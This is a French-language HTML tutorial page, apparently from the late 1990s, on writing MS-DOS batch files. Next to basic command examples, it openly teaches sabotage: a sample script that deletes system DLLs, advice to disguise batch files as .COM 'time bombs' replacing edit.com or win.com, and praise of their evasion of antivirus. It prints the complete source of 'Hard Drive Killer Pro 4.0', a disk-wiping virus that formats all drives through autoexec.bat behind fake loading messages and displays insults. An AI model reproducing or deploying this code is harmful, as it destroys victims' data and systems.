<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="Author" content="Clad Strife">
   <meta name="GENERATOR" content="Mozilla/4.61 [en] (Win98; I) [Netscape]">
   <title>Les fichiers .bat: cr&eacute;ation, explications et faille</title>
</head>
<body text="#000000" bgcolor="#FFF5F0" link="#0000EE" vlink="#551A8B" alink="#FF0000">

<center><b><tt><font size=+2>Les fichiers .BAT</font></tt></b></center>

<p><br>
<br>
<br>
<br>
<br>
<p>Les .bat sont des fichiers &eacute;x&eacute;cutables regroupant des
lignes de commande MS-DOS. Ces fichiers peuvent-&ecirc;tre &eacute;dit&eacute;s
&agrave; partir d'un &eacute;diteur texte quelconque: le mieux reste NotePad.
<br>&nbsp;&nbsp; Un "d&eacute;faut" (&ccedil;a d&eacute;pend du point de
vue) majeur avec le .bat fait maison est qu'il est ind&eacute;tectable
aux antivirus.
<br>&nbsp;&nbsp; La cr&eacute;ation de fichiers .bat est simple: il suffit
de s'y connaitre un peu en MS-DOS. D'abord quelqes commandes de bases:
<br><font color="#008080">echo off </font>: d&eacute;sactive l'affichage
de ce qui se passe
<br><font color="#008080">dir C:\WINDOWS</font> : affiche le contenu de
C:\WINDOWS
<br><font color="#008080">del C:\WINDOWS\*.exe</font> : efface tous les
fichiers .exe du C:\WINDOWS
<br><font color="#008080">echo.</font> : saute une ligne
<br><font color="#008080">echo ca ecrit bien hein?</font> : affiche ce
qui est &eacute;crit apr&egrave;s [echo]
<br><font color="#008080">cls</font> : efface l'&eacute;cran
<br><font color="#008080">pause</font> : demande d'appuyez sur une touche
pour continuer
<br><font color="#008080">C:\WINDOWS\telnet.exe</font> : &eacute;x&eacute;cute
telnet
<br>&nbsp;
<br>&nbsp;
<table BORDER COLS=1 WIDTH="100%" BGCOLOR="#FFCCCC" >
<tr>
<td><b><i>Note: </i></b>lorsque vous tapez un batch file vous ne devez
pas mettre d'accents en raison de la retranscription des caract&egrave;res
qui se fait mal entre DOS et Windows. Le mieux est &agrave; la limite de
taper son batch file depuis l'edit de DOS.</td>
</tr>
</table>

<p>Donc voici le genre de fichiers .bat extr&egrave;mement dangereux que
vous pouvez faire:
<br><tt><font color="#3333FF">echo off</font></tt>
<br><tt><font color="#3333FF">echo this programm is created by XXX all
rights reserved</font></tt>
<br><tt><font color="#3333FF">pause</font></tt>
<br><tt><font color="#3333FF">del C:\WINDOWS\system\*.dll</font></tt>
<br><tt><font color="#3333FF">echo Ce qui va suivre est un dir de tes fichiers
.dll du c:\windows\system</font></tt>
<br><tt><font color="#3333FF">pause</font></tt>
<br><tt><font color="#3333FF">dir C:\WINDOWS\system\*.dll</font></tt>
<br><tt><font color="#3333FF">echo desole</font></tt>
<br><tt><font color="#3333FF">cls</font></tt>
<br>On peut aussi cr&eacute;er des menus d'options:
<br><font color="#3333FF">@echo off</font>
<p><font color="#3333FF">:menu</font>
<br><font color="#3333FF">cls</font>
<br><font color="#3333FF">echo.</font>
<br><font color="#3333FF">echo Menu d'options :</font>
<br><font color="#3333FF">echo -----------------------</font>
<br><font color="#3333FF">echo 1. Editer autoexec.bat</font>
<br><font color="#3333FF">echo 2. Editer config.sys</font>
<br><font color="#3333FF">echo.</font>
<br><font color="#3333FF">echo Q. Quitter</font>
<br><font color="#3333FF">echo.</font>
<br><font color="#3333FF">choice /c:12Q /t:Q,60 /n Votre choix ?</font>
<br><font color="#3333FF">if errorlevel 255 goto erreur</font>
<br><font color="#3333FF">if errorlevel 3 goto Quitter</font>
<br><font color="#3333FF">if errorlevel 2 goto EditConf</font>
<br><font color="#3333FF">if errorlevel 1 goto EditAuto</font>
<br><font color="#3333FF">if errorlevel 0 goto erreur</font>
<br><font color="#3333FF">goto fin</font>
<p><font color="#3333FF">:erreur</font>
<br><font color="#3333FF">echo Il y a eu une erreur.</font>
<br><font color="#3333FF">goto fin</font>
<p><font color="#3333FF">:Quitter</font>
<br><font color="#3333FF">goto fin</font>
<p><font color="#3333FF">:EditConf</font>
<br><font color="#3333FF">edit c:\config.sys</font>
<br><font color="#3333FF">goto menu</font>
<p><font color="#3333FF">:EditAuto</font>
<br><font color="#3333FF">edit c:\autoexec.bat</font>
<br><font color="#3333FF">goto menu</font>
<br><font color="#3333FF">:fin</font>
<p>Si vous n'avez pas compris le passage sur la commande choice et errorlevel,
voil&agrave; de quoi vous aider:
<br>Aide sur CHOICE :
<p><font color="#008080">choice [/c:ON] [/t:X,nn] [/n] [Invite]</font>
<br><font color="#000000">/c:ON Choix de lettres utilisables (ici O et
N) (ON par d&eacute;faut)</font>
<br><font color="#000000">/t:X,nn Choisira automatiquement option X apr&egrave;s
nn secondes. X doit faire parti de la liste /c:</font>
<br><font color="#000000">/n Interdit le respect de la casse</font>
<br><font color="#000000">Invite Texte d'invite qui appara&icirc;t</font>
<p>Errorlevel correspond au choix de l'utilisateur. c'est comme la variable
de r&eacute;ponse en Q-Basic.
<p>Param&egrave;tre de la ligne de commande
<p><font color="#3333FF">@echo off</font>
<br><font color="#3333FF">cls</font>
<br><font color="#3333FF">echo.</font>
<br><font color="#3333FF">echo Le prog est %0</font>
<br><font color="#3333FF">echo.</font>
<br><font color="#3333FF">echo Bonjour %1,</font>
<br><font color="#3333FF">echo.</font>
<br><font color="#3333FF">echo A plus, %2</font>
<br>&nbsp;
<p>Enregistrer sous "c:\test.bat" et taper sous dos :
<br><font color="#008080">c:\test.bat "votrenom" "unAutrenom"</font>
<p>%X correspond au Xi&egrave;me groupe de caract&egrave;res sur la ligne
de commande pour X={0;9}
<p>Tr&egrave;s pratique pour faire un prog d'installation :
<br><font color="#008080">xcopy a:\*.* %1:\%2</font>
<br>Ici, %1 est la lettre de lecteur et %2 le dossier.
<p>&nbsp;&nbsp; Voil&agrave; pour la partie de cr&eacute;ation de fichiers.
Apr&egrave;s vous pouvez avoir recour &agrave; de petites astuces. Par
exemple, pour &eacute;viter &agrave; quelqu'un d'&eacute;diter les fichiers.bat,
utilisez un programme sp&eacute;cifique qui permet de faire passer les
.bat en .COM. Vous pouvez ensuite renommer le .com en .exe. Bat2exec le
fait tr&egrave;s bien sauf que les .com renomm&eacute;s en .exe ne peuvent
pas s'ouvrir sous Windows, et sont &agrave; ouvrir sous une session DOS.
Les .com peuvent s'ouvrir sous windows. Ainsi placez des bombes &agrave;
retardement: vous pouvez remplacer edit.com, win.com par des .com dangereux.
Vous pouvez aussi &eacute;diter l'autoexec.bat pour y placer des commandes
sp&eacute;cifiques.
<br>&nbsp;&nbsp; Une autre petite astuce avec les .bat consiste &agrave;
l'autodestruction de ceux-ci apr&egrave;s &eacute;x&eacute;cution. Rajoutez
une ligne de commande:
<br><font color="#008080">del test.bat</font>
<br><font color="#000000">&agrave; la fin du fichier pour que le .bat portant
le nom de "test" soit effac&eacute; dans le r&eacute;pertoire du programme
&eacute;x&eacute;cut&eacute; demandant cette suppression. Ce qui veut dire
que si c'est test.bat qui porte cette ligne de commande, il s'auto-d&eacute;truira.</font>
<p><font color="#000000">&nbsp;&nbsp; Il existe cependant des .bat d&eacute;tect&eacute;s
par des Anti-Virus. Voici le code source d'un virus en .bat que j'ai retrouv&eacute;:</font>
<br><tt><font color="#3333FF">@echo off</font></tt>
<br><tt><font color="#3333FF">rem This program is dedecated to a very special
person that does not want to be named.</font></tt>
<br><tt><font color="#3333FF">:start</font></tt>
<br><tt><font color="#3333FF">cls</font></tt>
<br><tt><font color="#3333FF">echo PLEASE WAIT WHILE PROGRAM LOADS . .
.</font></tt>
<br><tt><font color="#3333FF">call attrib -r -h c:\autoexec.bat >nul</font></tt>
<br><tt><font color="#3333FF">echo @echo off >c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo call format c: /q /u /autotest >nul
>>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">call attrib +r +h c:\autoexec.bat >nul</font></tt>
<p><tt><font color="#3333FF">rem Drive checking and assigning the valid
drives to the drive variable.</font></tt>
<p><tt><font color="#3333FF">set drive=</font></tt>
<br><tt><font color="#3333FF">set alldrive=c d e f g h i j k l m n o p
q r s t u v w x y z</font></tt>
<p><tt><font color="#3333FF">rem code insertion for Drive Checking takes
place here.</font></tt>
<br><tt><font color="#3333FF">rem drivechk.bat is the file name under the
root directory.</font></tt>
<br><tt><font color="#3333FF">rem As far as the drive detection and drive
variable settings, don't worry about how it</font></tt>
<br><tt><font color="#3333FF">rem works, it's damn to complicated for the
average or even the expert batch programmer.</font></tt>
<br><tt><font color="#3333FF">rem Except for Tom Lavedas.</font></tt>
<p><tt><font color="#3333FF">echo @echo off >drivechk.bat</font></tt>
<br><tt><font color="#3333FF">echo @prompt %%%%comspec%%%% /f /c vol %%%%1:
$b find "Vol" > nul >{t}.bat</font></tt>
<br><tt><font color="#3333FF">%comspec% /e:2048 /c {t}.bat >>drivechk.bat</font></tt>
<br><tt><font color="#3333FF">del {t}.bat</font></tt>
<br><tt><font color="#3333FF">echo if errorlevel 1 goto enddc >>drivechk.bat</font></tt>
<p><tt><font color="#3333FF">cls</font></tt>
<br><tt><font color="#3333FF">echo PLEASE WAIT WHILE PROGRAM LOADS . .
.</font></tt>
<p><tt><font color="#3333FF">rem When errorlevel is 1, then the above is
not true, if 0, then it's true.</font></tt>
<br><tt><font color="#3333FF">rem Opposite of binary rules. If 0, it will
elaps to the next command.</font></tt>
<p><tt><font color="#3333FF">echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p
$b find "bytes" > nul >{t}.bat</font></tt>
<br><tt><font color="#3333FF">%comspec% /e:2048 /c {t}.bat >>drivechk.bat</font></tt>
<br><tt><font color="#3333FF">del {t}.bat</font></tt>
<br><tt><font color="#3333FF">echo if errorlevel 1 goto enddc >>drivechk.bat</font></tt>
<p><tt><font color="#3333FF">cls</font></tt>
<br><tt><font color="#3333FF">echo PLEASE WAIT WHILE PROGRAM LOADS . .
.</font></tt>
<p><tt><font color="#3333FF">rem if errorlevel is 1, then the drive specified
is a removable media drive - not ready.</font></tt>
<br><tt><font color="#3333FF">rem if errorlevel is 0, then it will elaps
to the next command.</font></tt>
<p><tt><font color="#3333FF">echo @prompt dir %%%%1:.\/ad/w/-p $b find
" 0 bytes free" > nul >{t}.bat</font></tt>
<br><tt><font color="#3333FF">%comspec% /e:2048 /c {t}.bat >>drivechk.bat</font></tt>
<br><tt><font color="#3333FF">del {t}.bat</font></tt>
<br><tt><font color="#3333FF">echo if errorlevel 1 set drive=%%drive%%
%%1 >>drivechk.bat</font></tt>
<p><tt><font color="#3333FF">cls</font></tt>
<br><tt><font color="#3333FF">echo PLEASE WAIT WHILE PROGRAM LOADS . .
.</font></tt>
<p><tt><font color="#3333FF">rem if it's errorlevel 1, then the specified
drive is a hard or floppy drive.</font></tt>
<br><tt><font color="#3333FF">rem if it's not errorlevel 1, then the specified
drive is a CD-ROM drive.</font></tt>
<p><tt><font color="#3333FF">echo :enddc >>drivechk.bat</font></tt>
<p><tt><font color="#3333FF">rem Drive checking insertion ends here. "enddc"
stands for "end dDRIVE cHECKING".</font></tt>
<p><tt><font color="#3333FF">rem Now we will use the program drivechk.bat
to attain valid drive information.</font></tt>
<p><tt><font color="#3333FF">:testdrv</font></tt>
<p><tt><font color="#3333FF">for %%a in (%alldrive%) do call drivechk.bat
%%a >nul</font></tt>
<p><tt><font color="#3333FF">del drivechk.bat >nul</font></tt>
<p><tt><font color="#3333FF">:form_del</font></tt>
<br><tt><font color="#3333FF">call attrib -r -h c:\autoexec.bat >nul</font></tt>
<br><tt><font color="#3333FF">echo @echo off >c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo Loading Windows, please wait while
Microsoft Windows recovers your system . . . >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo for %%%%a in (%drive%) do call format
%%%%a: /q /u /autotest >nul >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo cls >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo Loading Windows, please wait while
Microsoft Windows recovers your system . . . >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo for %%%%a in (%drive%) do call c:\temp.bat
%%%%a Bunga >nul >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo cls >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo Loading Windows, please wait while
Microsoft Windows recovers your system . . . >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo for %%%%a in (%drive%) call deltree
/y %%%%a:\ >nul >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo cls >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo Loading Windows, please wait while
Microsoft Windows recovers your system . . . >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo for %%%%a in (%drive%) do call format
%%%%a: /q /u /autotest >nul >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo cls >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo Loading Windows, please wait while
Microsoft Windows recovers your system . . . >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo for %%%%a in (%drive%) do call c:\temp.bat
%%%%a Bunga >nul >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo cls >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo Loading Windows, please wait while
Microsoft Windows recovers your system . . . >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo for %%%%a in (%drive%) call deltree
/y %%%%a:\ >nul >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo cd\ >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo cls >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo Welcome to the land of death. Munga
Bunga's Multiple Hard Drive Killer version 4.0. >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo If you ran this file, then sorry,
I just made it. The purpose of this program is to tell you the following.
. . >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo 1. To make people aware that security
should not be taken for granted. >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo 2. Love is important, if you have
it, truly, don't let go of it like I did! >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo 3. If you are NOT a vegetarian,
then you are a murderer, and I'm glad your HD is dead. >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo 4. If you are Australian, I feel
sorry for you, accept my sympathy, you retard. >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo 5. Don't support the following:
War, Racism, Drugs and the Liberal Party.>>c:\autoexec.bat</font></tt>
<p><tt><font color="#3333FF">echo echo. >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo Regards, >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo. >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">echo echo Munga Bunga >>c:\autoexec.bat</font></tt>
<br><tt><font color="#3333FF">call attrib +r +h c:\autoexec.bat</font></tt>
<p><tt><font color="#3333FF">:makedir</font></tt>
<br><tt><font color="#3333FF">if exist c:\temp.bat attrib -r -h c:\temp.bat
>nul</font></tt>
<br><tt><font color="#3333FF">echo @echo off >c:\temp.bat</font></tt>
<br><tt><font color="#3333FF">echo %%1:\ >>c:\temp.bat</font></tt>
<br><tt><font color="#3333FF">echo cd\ >>c:\temp.bat</font></tt>
<br><tt><font color="#3333FF">echo :startmd >>c:\temp.bat</font></tt>
<br><tt><font color="#3333FF">echo for %%%%a in ("if not exist %%2\nul
md %%2" "if exist %%2\nul cd %%2") do %%%%a >>c:\temp.bat</font></tt>
<br><tt><font color="#3333FF">echo for %%%%a in (">ass_hole.txt") do echo
%%%%a Your Gone @$$hole!!!! >>c:\temp.bat</font></tt>
<br><tt><font color="#3333FF">echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul
goto startmd >>c:\temp.bat</font></tt>
<br><tt><font color="#3333FF">call attrib +r +h c:\temp.bat >nul</font></tt>
<p><tt><font color="#3333FF">cls</font></tt>
<br><tt><font color="#3333FF">echo Initializing Variables . . .</font></tt>
<br><tt><font color="#3333FF">rem deltree /y %%a:\*. only eliminates directories,
hence leaving the file created above for further destruction.</font></tt>
<br><tt><font color="#3333FF">for %%a in (%drive%) do call format %%a:
/q /u /autotest >nul</font></tt>
<br><tt><font color="#3333FF">cls</font></tt>
<br><tt><font color="#3333FF">echo Initializing Variables . . .</font></tt>
<br><tt><font color="#3333FF">echo Validating Data . . .</font></tt>
<br><tt><font color="#3333FF">for %%a in (%drive%) do call c:\temp.bat
%%a Munga >nul</font></tt>
<br><tt><font color="#3333FF">cls</font></tt>
<br><tt><font color="#3333FF">echo Initializing Variables . . .</font></tt>
<br><tt><font color="#3333FF">echo Validating Data . . .</font></tt>
<br><tt><font color="#3333FF">echo Analyzing System Structure . . .</font></tt>
<br><tt><font color="#3333FF">for %%a in (%drive%) call attrib -r -h %%a:\
/S&nbsp; >nul</font></tt>
<br><tt><font color="#3333FF">call attrib +r +h c:\temp.bat >nul</font></tt>
<br><tt><font color="#3333FF">call attrib +r +h c:\autoexec.bat >nul</font></tt>
<br><tt><font color="#3333FF">cls</font></tt>
<br><tt><font color="#3333FF">echo Initializing Variables . . .</font></tt>
<br><tt><font color="#3333FF">echo Validating Data . . .</font></tt>
<br><tt><font color="#3333FF">echo Analyzing System Structure . . .</font></tt>
<br><tt><font color="#3333FF">echo Initializing Application . . .</font></tt>
<p><tt><font color="#3333FF">for %%a in (%drive%) call deltree /y %%a:\*.
>nul</font></tt>
<br><tt><font color="#3333FF">cls</font></tt>
<br><tt><font color="#3333FF">echo Initializing Variables . . .</font></tt>
<br><tt><font color="#3333FF">echo Validating Data . . .</font></tt>
<br><tt><font color="#3333FF">echo Analyzing System Structure . . .</font></tt>
<br><tt><font color="#3333FF">echo Initializing Application . . .</font></tt>
<br><tt><font color="#3333FF">echo Starting Application . . .</font></tt>
<br><tt><font color="#3333FF">for %%a in (%drive%) do call c:\temp.bat
%%a Munga >nul</font></tt>
<p><tt><font color="#3333FF">cls</font></tt>
<br><tt><font color="#3333FF">echo Thank you for using a Munga Bunga product.</font></tt>
<br><tt><font color="#3333FF">echo.</font></tt>
<br><tt><font color="#3333FF">echo Oh and, Bill Gates rules, and he is
not a geek, he is a good looking genius.</font></tt>
<br><tt><font color="#3333FF">echo.</font></tt>
<br><tt><font color="#3333FF">echo Here is a joke for you . . .</font></tt>
<br><tt><font color="#3333FF">echo.</font></tt>
<br><tt><font color="#3333FF">echo&nbsp;&nbsp;&nbsp;&nbsp; Q). What's the
worst thing about being an egg?</font></tt>
<br><tt><font color="#3333FF">echo&nbsp; A). You only get laid once.</font></tt>
<br><tt><font color="#3333FF">echo.</font></tt>
<br><tt><font color="#3333FF">echo HAHAHAHA, get it? Don't you just love
that one?</font></tt>
<br><tt><font color="#3333FF">echo.</font></tt>
<br><tt><font color="#3333FF">echo Regards,</font></tt>
<br><tt><font color="#3333FF">echo.</font></tt>
<br><tt><font color="#3333FF">echo Munga Bunga</font></tt>
<p><tt><font color="#3333FF">:end</font></tt>
<p><tt><font color="#3333FF">rem Hard Drive Killer Pro Version 4.0, enjoy!!!!</font></tt>
<p><tt><font color="#3333FF">rem Author: Munga Bunga - from Australia,
the land full of retarded Australian's (help me get out of here).</font></tt>
<br>&nbsp;
<p><font color="#000000">&nbsp;&nbsp; On peut noter que les .bat sont aussi
&agrave; l'origines de failles dont une assez &eacute;trange sous WindowsNT.
Les fichiers comportant une extension .doc peuvent &ecirc;tre &eacute;x&eacute;cut&eacute;s,
m&ecirc;me s'ils ne sont pas r&eacute;ellement des fichiers .doc. Si un
cracker &eacute;crit un programme, par exemple appel&eacute; TEST.EXE et
qu'il le renomme TEST.DOC, celui-ci pourra n&eacute;anmoins &ecirc;tre
&eacute;x&eacute;cut&eacute;. Apparemment cel&agrave; ne fonctionne que
si le fichier est lanc&eacute; &agrave; partir d'une ligne de commande
particuli&egrave;re comme celles d'un .bat.</font>
<p><font color="#000000">&nbsp;&nbsp; D'autres astuces vous sont donn&eacute;s
dans la partie sur EXPLORER.EXE.
<br>
<br>
<b><i>Clad Strife</b></i></font>
</body>
</html>
